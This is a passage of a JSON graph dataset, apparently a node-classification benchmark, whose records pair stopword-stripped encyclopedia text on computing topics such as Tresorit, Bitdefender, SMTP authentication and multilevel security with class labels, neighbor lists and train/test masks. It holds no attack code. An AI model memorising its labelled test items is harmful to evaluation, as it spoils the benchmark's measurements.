applications using swing windows look-and-feel including compiled excelsior jet known crash windows 10 creators update god folder exists",
    "neighbors": [
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 10159,
    "label": 5,
    "text": "MIMIC_Simulator:mimic simulator mimic simulator product suite gambit communications consisting simulation software network systems management space mimic simulator suite several components related simulation managed networks data centers purposes software development software testing training sales marketing network management applications see mimic snmp simulator solves classical simulation problem network management operations support system software typically manages large networks traditionally order set networks purposes physical equipment separately purchased assembled laboratories reduce expense network simulated e.g see principle behind snmp simulation snmp protocol interface simulated snmp requests carry data values mib objects shaped simulator thus representing device snmp interface contrast network simulation entire network modeled within computer type empirical simulation visible network one communicate simulator network concept extended protocols modern management software typically uses multiple protocols manage networks simulator thus integrate required protocols present authentic instrumentation mimic ios simulator allows simulating cli protocol encountered cisco ios junos tl/1 low-end mimic virtual lab products used training cisco ccna mimic netflow simulator creates many custom netflow exporters mimic sflow simulator sflow mimic ipmi simulator simulates ipmi rmcp via lan interface high-end servers mimic web simulator handles http soap xml wsdl wsman redfish interfaces management via web services mimic iot simulator creates large iot environments based standard protocols mqtt coap",
    "neighbors": [
      10659,
      8262,
      6797,
      9365,
      10486,
      823,
      3133,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 10160,
    "label": 0,
    "text": "TenTen_Corpus_Family:tenten corpus family tenten corpus family also called tenten corpora set comparable web text corpora i.e collections texts crawled world wide web processed match standards corpora made available sketch engine corpus manager tenten corpora 35 languages target size 10 billion 10 words per language gave rise corpus family name creation tenten corpora data crawled world wide web processed natural language processing tools developed natural language processing centre faculty informatics masaryk university brno czech republic lexical computing company developer sketch engine corpus linguistics text corpus large structured collection texts electronically stored processed used hypothesis testing languages validating linguistic rules frequency distribution words n-grams within languages electronically processed corpora provide fast search text processing procedures tokenization part-of-speech tagging word-sense disambiguation enrich corpus texts detailed linguistic information enables narrow search particular parts speech word sequences specific part corpus first text corpora created 1960s 1-million-word brown corpus american english time many corpora produced british national corpus lob corpus work begun also corpora larger sizes covering languages english development linked emergence corpus creation tools help achieve larger size wider coverage cleaner data etc procedure tenten corpora produced based creators earlier research preparing web corpora subsequent processing thereof beginning huge amount text data downloaded world wide web dedicated spiderling web crawler later stage texts undergo cleaning consists removing non-textual material navigation links headers footers html source code web pages justext tool full solid sentences preserved eventually onion tool applied remove duplicate text portions corpus naturally occur world wide web due practices quoting citing copying etc tenten corpora follow specific metadata structure common metadata contained structural attributes relate individual documents paragraphs corpus tenten corpora feature additional specific attributes following corpora accessed sketch engine october 2018",
    "neighbors": [
      5635,
      5667,
      7780,
      2887,
      3721,
      9577,
      4971,
      5903,
      7599,
      113,
      1044,
      11348,
      119,
      538,
      5214
    ],
    "mask": "None"
  },
  {
    "node_id": 10161,
    "label": 7,
    "text": "Tresorit:tresorit tresorit online cloud storage service based switzerland hungary emphasizes enhanced security data encryption businesses individuals/freelancers business version offers 1tb storage space per user solo version offers 2tb one user extra security features drm granular access levels functions aim create safer collaborative environment tresorit likened high-security alternative dropbox tresorit service accessible client desktop software web-based application mobile apps currently software available windows macos android windows phone 8 ios linux tresorit founded 2011 hungarian programmers istvan lam remains ceo szilveszter szebeni currently cio gyorgy szilagyi cpo company tresorit officially launched client-side encrypted cloud storage service emerging stealth beta april 2014 august 2015 wuala owned lacie seagate pioneer secure cloud storage announced closing service 7 years recommended users choose tresorit secure cloud alternative end 2016 tresorit launched beta software development kit sdk zerokit january 2017 apple sdk project carekit announced option mobile app developers using carekit integrate zerokit enabling zero knowledge user authentication encryption medical health apps tresorit encrypts files using client-side encryption aes-256 uploading files also secured hmac message authentication codes applied sha-512 hashes tresors german vaults encrypted counterparts uploaded directories tresors automatically sync cloud files added removed similar box.com dropbox desktop software main difference tresorit competition tresorit applies aes-256 client-side encryption files still local uploads cloud company claims due end-to-end encryption users share protected files folders others work together keeping documents synced secure every step process additional layers security core privacy feature service encryption key never leaves user using zero-knowledge encryption protocols tresorit possession users ’ authentication data content files accessed servers delivered authorities upon request 2013 2014 tresorit hosted hacking contest offering 10,000 anyone hacked data encryption methods gain access servers months reward increased 25,000 later 50,000 challenging experts institutions like harvard stanford mit contest ran 468 days according company nobody able break encryption tresorit received number nominations awards up-cloud rewards named one top 5 cloud security solutions 2012 early 2016 forbes listed tresorit cofounder istvan lam among european 30 30 2017 tresorit listed finalist cybersecurity excellence awards category encryption",
    "neighbors": [
      2050,
      4869,
      2694,
      10631,
      4746,
      8331,
      4623,
      5650,
      6565,
      3629,
      7983,
      823,
      8640,
      9281,
      7238,
      10054,
      10185,
      7891,
      1239,
      8283,
      2267,
      7139,
      4710,
      4970,
      5749,
      8446
    ],
    "mask": "Test"
  },
  {
    "node_id": 10162,
    "label": 1,
    "text": "ArchINFORM:archinform archinform online database international architecture originally emerging records interesting building projects architecture students university karlsruhe germany self-described largest online-database worldwide architects buildings contains plans images buildings built potential forms record architecture 20th century database uses search engine allows particular project found listing architect location key word described librarian calouste gulbenkian foundation one useful reference tools concerning architecture available internet",
    "neighbors": [
      2901
    ],
    "mask": "Test"
  },
  {
    "node_id": 10163,
    "label": 4,
    "text": "Security_printing:security printing security printing field printing industry deals printing items banknotes cheques passports tamper-evident labels security tapes product authentication stock certificates postage stamps identity cards main goal security printing prevent forgery tampering counterfeiting recently many techniques used protect high-value documents become available commercial printers whether using traditional offset flexographic presses newer digital platforms businesses protecting lesser-value documents transcripts coupons prescription pads incorporating features listed ensure forged alteration data occur undetected number technical methods used security printing industry security printing often done security paper also occur plastic materials substrate banknotes made paper almost always cotton fibres strength durability cases linen speciality coloured forensic fibres added give paper added individuality protect counterfeiting countries including canada nigeria romania mexico new zealand israel singapore malaysia england australia produce polymer plastic banknotes improve longevity may include transparent windows 10 millimeters diameter security feature areas covered opacifying layer paper substrate may also include windows based laser-cut holes covered security foil holografic elements makes difficult reproduce using common counterfeiting techniques true watermark recognizable image pattern paper appears lighter darker surrounding paper viewed light behind paper due paper density variations watermark made impressing water coated metal stamp dandy roll onto paper manufacturing watermarks first introduced bologna italy 1282 well use security printing also used papermakers identify product proofing authenticity thinner part watermark shine brighter light source background darker dark background watermark proven anti-counterfeit technology counterfeits simulating appearance printing pattern printed white ink simulated watermarks different reflectance base paper seen angle ink white photocopied scanned similar effect achieved iriodin varnish creates reflections certain viewing angles transparent otherwise watermarks sometimes simulated polymer currency printing according pattern little anti-counterfeiting effect example australian dollar coat arms watermarked plastic bills diffractive optical element doe within transparent window create comparable effect requires laser beam verifcation intaglio printing technique image incised surface normally copper zinc plates used incisions created etching engraving image one may also use mezzotint printing surface covered ink rubbed vigorously tarlatan cloth newspaper remove ink surface leaving incisions damp piece paper placed top plate paper run printing press pressure transfers ink paper sharp printing obtained intaglio process hard imitate means intaglio also allows creation latent images visible document viewed shallow angle guilloché ornamental pattern formed two curved bands interlace repeat circular design made geometric lathe involves use extremely small text often used currency bank checks text generally small enough indiscernible naked eye cheques example use microprint signature line optically variable ink ovi made mica colored magnetizable inks prepared including chromatic pigments high color strength magnetic pigments ’ strong inherent color generally reduces spectrum achievable shades generally pigments used high concentrations ensure sufficient magnetizable material applied even thin offset coats magnetic pigment best suited colored magnetizable inks due lower blackness homogenous magnetization preferred orientation easily obtained pigment made spherical particles best results achieved remanence coercive field strength low saturating magnetization high pearlescent pigments viewed different angles angle light perceived makes color appear change magnetic fields within particles shift direction hologram may embedded either via hot-stamping foil wherein extremely thin layer micrometers depth bonded paper plastic substrate means hot-melt adhesive called size coat heat metal die may directly embossed holographic paper onto laminate card incorporated custom design pattern logo hologram hot stamping foils become security foils protect credit cards passports bank notes value documents counterfeiting holograms help curtailing forging duplication products hence essential security purposes stamped product removed forged enhancing product time also security perspective stamped hologram superior security device virtually impossible remove substrate metal threads foils simple iridescent features foil color copying foils additional optically variable effects often used two kinds security threads one thin aluminum coated partly de-metalized polyester film thread microprinting embedded security paper banknote passport paper kind security thread single multicolor sewing thread made cotton synthetic fibers mostly uv fluorescent bookbinding passport booklets recent designs security thread enhanced security features holograms three-dimensional effects tilted occasion banknote designers succumb titanic effect excess belief latest technology place much faith particular trick example forgery british banknotes 1990s british banknotes 1990s featured windowed metal strip paper 1 mm wide comes paper surface every 8 mm examined reflected light appears dotted metallic line running across viewed transmitted light metal strip dark solid duplicating thought difficult criminal gang able reproduce quickly used cheap hot-stamping process lay metal strip surface paper printed pattern solid bars using white ink leave expected metal pattern visible trial found forged tens millions pounds ’ worth notes period years speed read computer systems magnetic ink character recognition used extensively banking primarily personal checks ink used magnetic ink character recognition micr technology also used greatly reduce errors automated computerized reading pigment dispersed binder system resin solvent wax compound applied either pressing hot melt carrier film usually polyethylene people believe magnetic ink intended fraud prevention concept yet original intent non-optical technology writing cheque like signatures would interfere reading main magnetic fonts e13-b cmc7 downloadable small fee addition magnetic toner available many printers higher resolution toners sufficient magnetic properties magnetic reading successful without special toner serial numbers help make legitimate documents easier track audit help detect forgeries serial numbers normally check digit verify serial number banknote printing unique serial number provides effective means monitoring verification production volume another method protection create trap numbers within serial number range example system may automatically invalidate numbers range 200-300 e.g 210 205 would invalid system may even take single random numbers within block e.g ending 51 37 48 within 200-300 range would invalid late twentieth century advances computer photocopy technology made possible people without sophisticated training easily copy currency attempt prevent banks sought add filtering features software hardware available public senses features currency locks reproduction material marks one known example system eurion constellation sometimes original document value original signed cheque example value photocopy original prescription script filled photocopy copy-evident technologies provide security hard copy documents helping distinguish original document copy common technology help differentiate originals copies void pantograph void pantographs essentially invisible untrained naked eye original scanned copied layout lines dots dashes reveal word frequently void hence name symbol clearly allows copy identified technology available traditional presses offset flexographic newer digital platforms advantage digital press single pass printer void pantograph variable data printed plain paper copy-evident paper sometimes marketed ‘ security paper ’ pre-printed void pantograph paper usually produced offset flexographic press quality void pantograph usually quite good produced press high resolution small number originals printed cost effective solution however advent digital printer rapidly eroded benefit second technology complements enhances effectiveness void pantograph verification grid technology visible original usually fine lines symbols photocopied lines images disappear inverse reaction void pantograph common examples technology fine lines edge cheque disappear copied coupon symbol shopping cart disappears unauthorized copy made verification grid available either traditional digital presses together void pantograph verification grid complement reactions copying inverse resulting higher degree assurance hard copy document original use color greatly assist prevention forgeries including color document color photocopier must used attempt make copy however use machines also tends enhance effectiveness technologies void pantographs verification grids see copy-evident using two colors background blending together prismatic effect created done either traditional digital press document using technique attempted photocopied scanning re-creation color copier inexact usually resulting banding blotching thereby immediate recognition document copy frequent example prismatic coloring checks combined techniques void pantograph increase difficulty successful counterfeiting carefully created images hidden background picture document images seen without help inexpensive lens specific line screening placed location image rotated image becomes visible document photocopied halo image lost known implementation scrambled indicia halo printed traditional digital presses advantage traditional presses multiple images overlaid location become visible turn lens rotated halo used technique authenticate originality document may used verify critical information within document example value coupon might encoded halo image could verified time redemption similarly seat number sporting event ticket false-positive testing derives name testing requires false positive reaction authenticate document common instance widely available counterfeit detector marker seen many banks stores counterfeit detector markers use chemical interaction substrate usually paper document turning particular color usually marker turns newsprint black leaves currency specially treated areas document clear gold reaction coloring varies depending upon formulation banknotes specially manufactured substrate usually behave differently standard newsprint paper difference counterfeits detected markers false-positive testing also done documents currencies means test authenticity stroke marker symbol word value revealed allow user quickly verify document coupon advanced applications marker creates barcode scanned verification reference data within document resulting higher degree assurance authenticity photocopied documents lack special characteristics substrate easily detectable false-positive testing generally one time test done results remain visible useful part coupon technique suitable id badges example fluorescent dyes react fluorescence ultraviolet light unusual lighting show words patterns pictures may visible invisible normal lighting feature also incorporated many banknotes documents e.g northern ireland nhs prescriptions show picture local '8th wonder giant causeway uv light producers include multi-frequency fluorescence different elements fluoresce specific frequencies light phosphorescence may accompany fluorescence shows after-glow uv light switched banknotes typically printed fine alignment so-called see-through registration window offset printing side note allows note examined feature provides opportunities unambiguously align features note printing difficult imitate accurately enough print shops advent rfid based smart card technology possible insert extremely small rf-active devices printed product enhance document security apparent modern biometric passports rfid chip mirrors printed information biometric passports additionally include data verification individual fingerprint face recognition automated border control gates security ink normal trigger temperature either disappear change colors ink rubbed usually fingertips pressure-sensitive hot stamped labels characterized normal gray colored appearance viewed via special filter polarizer additional normally latent image appears intaglio printing similar effect may achieved viewing banknote slanted angle",
    "neighbors": [
      10976,
      8839,
      9745,
      4882,
      1588,
      1845,
      6324,
      5433,
      6141,
      10685
    ],
    "mask": "None"
  },
  {
    "node_id": 10164,
    "label": 1,
    "text": "The_National_Law_Review:national law review national law review american law journal legal news website legal analysis content-aggregating database site offers news coverage analysis recent court decisions regulatory changes legislative actions includes original content content submitted various professionals legal business communities online version national law review started research tool group corporate attorneys looking store classify useful legal analysis news located internet on-line version specializes news analysis following types american law administrative law banking law bankruptcy law civil procedure common law competition law conflicts laws construction law consumer protection contract law copyright law business criminal law cyberlaw election law energy law entertainment law environment law family law financial regulation law health law immigration law insurance law intellectual property law labour law labor law military law municipal law patent law product liability property law securities law statutory law tort law tax law trademark law trust law national law review print edition founded 1888 philadelphia legal publishers kay brother monthly scholarly law review included sections current legal news book review section digest important decisions summarized recent judicial decisions various states section devoted current legal thought organized legal topic historically articles law reviews often considered persuasive authority american courts though influence generally thought waning recent years on-line edition national law review developed chicago illinois corporate attorney jennifer schaller legal internet professionals order provide easily accessible reliable database articles written experts analyzing legal news trends on-line edition described straightforward practical informative traditional law review containing information potential interest legal business professionals often serves reference source legal periodicals addition serving source emerging american legal issues mainstream media national law review provides several services interest practicing lawyers law students running example law student writing competition published articles multiple areas law",
    "neighbors": [
      9732
    ],
    "mask": "Test"
  },
  {
    "node_id": 10165,
    "label": 1,
    "text": "National_Forensic_DNA_Database_of_South_Africa:national forensic dna database south africa national forensic dna database south africa nfdd national dna database used law enforcement south africa criminal law forensic procedures amendment act 37 2013 dna act provides expansion administration database south africa enabling south african police service saps match forensic dna profiles derived samples collected crime scenes forensic dna profiles offenders convicted suspects arrested offences listed new schedule 8 amended criminal procedure act 1977 dna profiling used south african law enforcement since 1998 albeit without legal framework prior commencement dna act dna criminal intelligence database dcid developed saps administered biology unit saps forensic science laboratory fsl repository dna profiles held fsl prior commencement dna act comprises two indices namely casework index containing forensic dna profiles derived biological samples collected crime scenes reference index containing forensic dna profiles known people including victims suspects volunteers personnel criminal procedure act 1977 currently prevents dna samples taken convicted offenders dna profiles dcid generated analysing ampflstr profiler plus str multiplex system 9 different str loci d3s1358 vwa fga d8s1179 d21s11 d18s51 d5s818 d13s317 d7s820 plus amelogenin sex determination approximately 80,000 dna profiles dcid 2007 number increasing approximately 180,000 late 2013 criminal law forensic procedures amendment act 37 2013 dna act provides expansion regulation administration national dna database known national forensic dna database south africa nfdd initial criminal law forensic procedures amendment bill drafted 2008 tabled parliament 2009 subsequently split two separate bills criminal law forensic procedures amendment bill b2–2009 dealing fingerprints body-prints assented 2010 came effect 18 january 2013 separate bill unofficially known dna bill re-introduced parliament may 2013 addresses various concerns arose regarding initial bill including relating human rights issues final version dna bill namely criminal law forensic procedures amendment bill b9d–2013 passed national assembly 12 november 2013 assented president jacob zuma 23 january 2014 commencement date dna act 31 january 2015 dna act provides inter alia nfdd comprises six indices containing forensic dna profiles namely crime scene index arrestee index convicted offender co index investigative index elimination index missing persons unidentified human remains index mandatory dna sampling applies persons convicted persons arrested offences listed new schedule 8 amended criminal procedure act 1977 offences listed schedule 8 may amended initial implementation phase takes account capacity constraints dna profiles nfdd generated analysing 15 different str loci plus amelogenin sex determination different retention frameworks apply six different indices crime scene index contains forensic dna profiles obtained crime scene samples biological evidence collected crime scenes held nfdd indefinitely arrestee index convicted offender index contains forensic dna profiles persons arrested convicted case may schedule 8 offence range rape murder burglary forensic dna profiles entered arrestee index either migrated convicted offender index upon conviction held indefinitely removed within three years arrest result conviction forensic dna profiles obtained volunteers informed consent held investigative index removed nfdd within 3 months case finalised repository dna profiles held state fsl expected transferred nfdd within 3 months dna database operational 2013 fsl investigating implementing combined dna index system database software developed fbi dna act subject five-year implementation plan takes account new training equipment requirements brazil families crime victims south africa successfully campaigned establishment national forensic dna database dna project non-profit organisation advocacy initiative founded attorney vanessa lynch following unsolved murder lynch father john lynch 2004 dna project advocates establishment expansion national forensic dna database hence earlier identification criminal suspects campaigned passing dna bill donated laboratory equipment fsl funded uk forensic science service diagnostic review south africa fsl initiated dna forensic awareness training programs developed post-graduate forensic analyst qualification",
    "neighbors": [
      7016
    ],
    "mask": "Train"
  },
  {
    "node_id": 10166,
    "label": 4,
    "text": "Bitdefender:bitdefender bitdefender romanian cybersecurity anti-virus software company founded 2001 florin talpeș currently ceo bitdefender develops sells anti-virus software internet security software endpoint security software cybersecurity products services 2018 software 500 million users worldwide bitdefender software originally developed softwin sold avx antivirus expert 1996 2001 name changed 2007 softwin spun bitdefender bitdefender develops markets anti-virus internet security endpoint security cyber security products services bitdefender internet things device protection solution called bitdefender box box router designed protect smart home products internet things devices blocking malicious internet traffic available windows mac bitdefender offers cloud-based security solution anti-malware anti-theft capabilities android ios users called bitdefender mobile security businesses company markets bitdefender gravityzone enterprise security includes self-configuring kits deployment desktop datacenter cloud software secures physical virtual cloud-based endpoints software uses network malware data stay updated software product small businesses looking simple security called bitdefender gravityzone business security bitdefender antispam neunet antispam filter trained bitdefender antispam lab series spam messages learns recognize new spam perceiving similarities messages already examined may 2006 bitdefender developed new technology b-have reduce dependency virus signatures proactive detection unknown threats technology based behavioral analysis virtualized environment bitdefender introduced active virus control august 2009 technology continuously monitors program specific processes running pc executes notes malware-like actions action scored given threshold reached process reported harmful 2014 version company claimed feature new technology called fuoton technology says visibly improves computer speed performance gradually adapting pc content filtering technologies developed filter raw online content applicable used antispam anti-phishing web filtering scanning spam social networks facilitate creation signatures proactively detect never-before-seen malicious files company claims bitdefender using cloud-based machine learning identify new malware malicious urls online threats processing analysing big data obtain behavioral patterns predict future advanced threats may 2009 customers criticized bitdefender support service lack responses bitdefender responded saying aware problems would take steps solve attributed problem unexpectedly high surge customers currently company website claims support available 24/7 telephone email livechat online knowledge base 20 march 2010 computers running bitdefender 64-bit versions windows affected malfunctioning update classified every executable program well dll files infected files marked 'trojan.fakealert.5 moved quarantine action led software systems malfunctions affected users around world bitdefender representatives announced removal faulty update workaround users affected except using 2008 version version 2012 bitdefender comodo firewall bitdefender co-exist currently official solution unofficial suggestions forums bitdefender bitdefender incompatible asus aisuite2 asus aisuite3 motherboard optimization suite software bundled asus motherboards enables automatic overclocking power tuning fan control bitdefender claims incompatibility due ndis asus driver winpkfilter lightweight filter prevents installation bitdefender files",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1417,
      7948,
      3981,
      6797,
      10637,
      9488,
      4374,
      3739,
      1052,
      156,
      9885,
      6431,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      3885,
      4013,
      6699,
      8615,
      6834,
      4403,
      9523,
      4023,
      1979,
      7103,
      704,
      9537,
      7362,
      10308,
      4421,
      202,
      1355,
      5069,
      10574,
      7251,
      10708,
      2005,
      1622,
      7639,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      10079,
      9569,
      2147,
      3941,
      11622,
      9832,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      10745,
      9341,
      2558,
      127
    ],
    "mask": "Test"
  },
  {
    "node_id": 10167,
    "label": 4,
    "text": "SMTP_Authentication:smtp authentication smtp authentication often abbreviated smtp auth extension simple mail transfer protocol smtp whereby client may log using authentication mechanism supported server mainly used submission servers authentication mandatory smtp specified jon postel 1970s provide using passwords sending email messages server design open mail relay initially problem late '90s spam worms become plague smtp auth relay client identified ip address practical email services provided internet service provider isp supplying connection else using specific hacks pop smtp john gardiner myers published first draft smtp auth 1995 successively developed discussed ietf along mail submission protocol extended smtp esmtp simple authentication security layer sasl older sasl mechanism esmtp authentication esmtpa cram-md5 uses md5 algorithm hmacs hash-based message authentication codes still considered sound internet mail consortium imc reported 55 mail servers open relays 1998 less 1 2002 using mail submission agent msa generally port 587 implies smtp auth msa usage supported software recommended especially support nomadic users several network hubs either block port 25 use smtp proxies msa responsible ensuring message envelope contains good addresses may enforce local policies codice_1 header field verifying envelope sender a.k.a codice_2 used spf address agree authenticated user-id particularly important domains sign messages using dkim keywords ending codice_3 codice_4 provided codice_5 clause codice_6 header fields messages received smtp auth keywords provided statistical diagnostic purposes rfc 3848 checked clients e.g spamassassin smtp extensions smtp auth advertised ehlo response along list supported authentication methods methods may change issuing starttls typically allowing plain text passwords latter case rfc 4954 provides following example c part protocol indicate lines sent client server respectively smtp auth used also port 25 usually servers reject rcpt commands imply relaying unless authentication credentials accepted specification recommends servers issue 530 5.7.0 authentication required response commands case server configured require authentication client n't done yet servers listening port 587 private servers configured way message exchange mx however historical trait smtp authenticated default results different behavior regard access protocols cases example using auth external starttls besides auth command extension also provides auth parameter mail command allow distinguish authentication authorization way sender identify transmit several messages session authentication n't need vary established different messages may sent according different agreements hence require different authorization example messages may relayed behalf different users use parameter much less popular using command grant relay privileges using authentication ehlo used greeting indicate extended smtp use opposed deprecated helo greeting still accepted extension used backward compatibility capitalized text auth command list types authorization smtp server accept examples authorization protocols include",
    "neighbors": [
      2274,
      1125,
      10696,
      4009,
      8202,
      8337,
      4793,
      9909,
      4663,
      2041,
      6750
    ],
    "mask": "Test"
  },
  {
    "node_id": 10168,
    "label": 7,
    "text": "Personal_cloud:personal cloud personal cloud collection digital content services accessible device personal cloud tangible entity place gives users ability store synchronize stream share content relative core moving one platform screen location another created connected services applications reflects sets consumers ’ expectations next-generation computing services work four primary types personal cloud use today online cloud nas device cloud server device cloud home-made clouds online cloud also sometimes referred public cloud online cloud cloud computing model online resources like software data storage made available internet service provider online cloud model cloud services provided virtualized system constructed using pooled shared physical resources accessed internet typically individual organization little control ecosystem online cloud hosted core infrastructure shared many individuals organizations data applications provided service provider logically segregated authorized allowed access network-attached storage nas device computer connected network provides file-based data storage services devices network although may technically possible run software nas device designed general purpose server cloud nas remote storage accessed internet local cloud nas often used backups archiving one benefits nas cloud data cloud accessed time anywhere main drawback however speed transfer rate fast network connection data accessed therefore fairly slow three examples nas personal clouds cloud western digital cloudbox lacie central seagate many ways cloud servers work way physical servers functions perform different typically cloud server on-premises device connected internet gives users functions available online cloud added benefit security files control premises server cloud historically enterprise-based deployed businesses needing in-house cloud however also in-house options available individual users open-source owncloud runs linux cloudlocker device stoamigo nimbus project technologically proficient user common solution using personal cloud create home-made cloud system connecting external usb hard drive wi-fi router enables wired wireless computers access usb hard drive use storage retrieving files user needs share network thereby acting like cloud challenge home-made cloud order set user certain degree skills technology network setup solution novices average consumers setup done tech expert biggest issue security leaving files accessible anyone technical knowledge every router supports type access modification three biggest routers allow type connection linksys netgear asus",
    "neighbors": [
      4194,
      2694,
      4623,
      1968,
      5202,
      10270,
      8446,
      5791
    ],
    "mask": "None"
  },
  {
    "node_id": 10169,
    "label": 6,
    "text": "B1_Free_Archiver:b1 free archiver b1 free archiver proprietary freeware multi-platform file archiver file manager b1 archiver available microsoft windows linux macos android full support compression unpacking encryption zip native b1 format program decompresses 20 popular archive formats creates split encrypted archives b1 free archiver translated 30 languages translations made volunteers crowdin localization management platform program used graphical user interface command line interface b1 free archiver written c++/qt released proprietary license b1 free archiver supports opening popular archive formats b1 zip rar 7z gzip tar.gz tar.bz2 iso create .b1 .zip archives utility also create split archives consist several parts specified size password-protected archives encrypted 256 bit aes algorithm desktop application supports editing archive adding new files deleting files archive editing files directly archive b1 free archiver full drag-and-drop support keyboard shortcuts hotkeys navigation program works windows xp higher linux ubuntu/debian fedora macos 10.6 higher android also online b1 free archiver decompression tool",
    "neighbors": [
      6797,
      7983,
      950,
      823,
      10623
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10170,
    "label": 4,
    "text": "Multilevel_security:multilevel security multilevel security multiple levels security mls application computer system process information incompatible classifications i.e. different security levels permit access users different security clearances needs-to-know prevent users obtaining access information lack authorization two contexts use multilevel security one refer system adequate protect subversion robust mechanisms separate information domains trustworthy another context refer application computer require computer strong enough protect subversion possess adequate mechanisms separate information domains system must trust distinction important systems need trusted necessarily trustworthy mls operating environment often requires highly trustworthy information processing system often built mls operating system os necessarily mls functionality supported system composed entirely untrusted computers although requires multiple independent computers linked hardware security-compliant channels see section b.6.2 trusted network interpretation ncsc-tg-005 example hardware enforced mls asymmetric isolation one computer used mls mode computer must use trusted operating system os information mls environment physically accessible os strong logical controls must exist ensure access information strictly controlled typically involves mandatory access control uses security labels like bell–lapadula model customers deploy trusted operating systems typically require product complete formal computer security evaluation evaluation stricter broader security range lowest highest classification levels system process trusted computer system evaluation criteria tcsec first evaluation criteria developed assess mls computer systems criteria clear uniform mapping security requirements breadth mls security range historically implementations certified capable mls processing security range unclassified top secret among honeywell scomp usaf sacdin nsa blacker boeing mls lan tcsec 1980s vintage intel 80386-based currently mls products evaluated common criteria late 2008 first operating system certified high evaluated assurance level evaluation assurance level eal eal 6+ high robustness auspices u.s. government program requiring multilevel security high threat environment assurance level many similarities old orange book a1 formal methods functional requirements focus fundamental isolation information flow policies rather higher level policies bell-la padula common criteria decoupled tcsec pairing assurance eal functionality protection profile clear uniform mapping security requirements mls security range capability documented csc-std-004-85 largely lost common criteria superseded rainbow series freely available operating systems features support mls include linux security-enhanced linux feature enabled freebsd security evaluation thought problem free mls implementations three reasons notwithstanding suppositions red hat enterprise linux 5 certified lspp rbacpp capp eal4+ june 2007 uses security-enhanced linux implement mls first common criteria certification enforce toe security properties security-enhanced linux vendor certification strategies misleading laypersons common strategy exploits layperson overemphasis eal level over-certification certifying eal 3 protection profile like capp elevated levels like eal 4 eal 5 another adding certifying mls support features role-based access control protection profile rbacpp labeled security protection profile lspp kernel evaluated mls-capable protection profile types features services run kernel depend kernel protect corruption subversion kernel evaluated mls-capable protection profile mls features trusted regardless impressive demonstration looks particularly noteworthy capp specifically mls-capable profile specifically excludes self-protection capabilities critical mls general dynamics offers pitbul l trusted mls operating system pitbull currently offered enhanced version red hat enterprise linux earlier versions existed sun microsystems solaris ibm aix svr4 unix pitbull provides bell lapadula security mechanism biba integrity mechanism privilege replacement superuser many features pitbull security base general dynamics trusted network environment tne product since 2009 tne enables multilevel information sharing access users department defense intelligence communities operating varying classification levels also foundation multilevel coalition sharing environment battlefield information collection exploitation systems extended bices-x sun microsystems oracle corporation offers solaris trusted extensions integrated feature commercial oss solaris opensolaris addition controlled access protection profile capp role-based access control rbac protection profiles trusted extensions also certified eal4 labeled security protection profile lspp security target includes desktop network functionality lspp mandates users authorized override labeling policies enforced kernel x window system x11 server evaluation include covert channel analysis certifications depend capp common criteria certifications suggest product trustworthy mls bae systems offers xts-400 commercial system supports mls vendor claims high assurance predecessor products including xts-300 evaluated tcsec b3 level mls-capable xts-400 evaluated common criteria eal5+ capp lspp protection profiles capp lspp eal3 protection profiles inherently mls-capable security target common criteria evaluation product contains enriched set security functions provide mls capability sanitization problem area mls systems systems implement mls restrictions like defined bell–lapadula model allow sharing obviously violate security restrictions users lower clearances easily share work users holding higher clearances vice versa efficient reliable mechanism top secret user edit top secret file remove top secret information deliver users secret lower clearances practice mls systems circumvent problem via privileged functions allow trustworthy user bypass mls mechanism change file security classification however technique reliable covert channels pose another problem mls systems mls system keep secrets perfectly must possible way top secret process transmit signals kind secret lower process includes side effects changes available memory disk space changes process timing process exploits side effect transmit data exploiting covert channel extremely difficult close covert channels practical computing system may impossible practice process identifying covert channels challenging one commercially available mls systems attempt close covert channels even though makes impractical use high security applications bypass problematic introduced means treat system high object mls trusted common example extract data secret system high object sent unclassified destination citing property data trusted evidence 'really unclassified e.g 'strict format system high system trusted preserve trusted evidence result overt data path opened logical way securely mediate bypass risky unlike narrow bandwidth covert channels difficult exploit bypass present large easily exploitable overt leak system bypass often arises failure use trusted operating environments maintain continuous separation security domains way back origin origin lies outside system boundary may possible validate trusted separation origin case risk bypass unavoidable flow truly essential common example unavoidable bypass subject system required accept secret ip packets untrusted source encrypt secret userdata header deposit result untrusted network source lies outside sphere influence subject system although source untrusted e.g system high trusted mls provides packets unclassified headers secret plaintext userdata mls data construct since source untrusted could corrupt place secrets unclassified packet header corrupted packet headers could nonsense impossible subject system determine reasonable reliability packet userdata cryptographically well protected packet header contain readable secrets corrupted packets passed untrusted network subject system may routable cooperating corrupt process network could grab packets acknowledge subject system may detect leak large overt leak hard detect viewing classified packets unclassified headers system high structures instead mls structures really presents common serious threat bypass avoidable avoidable bypass often results system architects design system correctly considering security attempt apply security fact add-on functions situation bypass appears easy way make system work pseudo-secure schemes proposed approved examine contents bypassed data vain attempt establish bypassed data contains secrets possible without trusting something data format contrary assumption source trusted preserve characteristics source data assured secure bypass myth so-called high assurance guard hag transparently implements bypass risk introduce long acknowledged extant solutions ultimately procedural rather technical way know certainty much classified information taken systems exploitation bypass decline compusec experts laypersons compusec-astute designing secure computing systems mistakenly drawing conclusion term mls overloaded two uses mls processing environment vs mls capability false conclusion based belief products certified operate mls environment mode therefore mls capability exist one imply many systems operate environment containing data unequal security levels therefore mls computer security intermediate value theorem cs-ivt consequence confusion runs deeper noted however nsa-certified mls operating systems databases networks existed operational mode since 1970s mls products continuing built marketed deployed laypersons often conclude admit system operates mls environment environment-centric meaning mls backed perceived corner problem mls solution capability-centric meaning mls mls deceptively complex simple solutions obvious justify conclusion exist lead crippling ignorance compusec manifests whispers one talk mls thing mls mls-denial schemes change rapidly addressed instead important clarify distinction mls-environment mls-capable original use term mls applied security environment mode one solution confusion retain original definition mls specific mls-capable context used multiple independent levels security mils architecture addresses domain separation component mls note ucdmo us government lead cross domain multilevel systems created term cross domain access category baseline dod intelligence community accredited systems category seen essentially analogous mils security models biba model integrity bell–lapadula model confidentiality allow one-way flow certain security domains otherwise assumed isolated mils addresses isolation underlying mls without addressing controlled interaction domains addressed models trusted security-compliant channels mentioned link mils domains support mls functionality mils approach pursues strategy characterized older term msl multiple single level isolates level information within 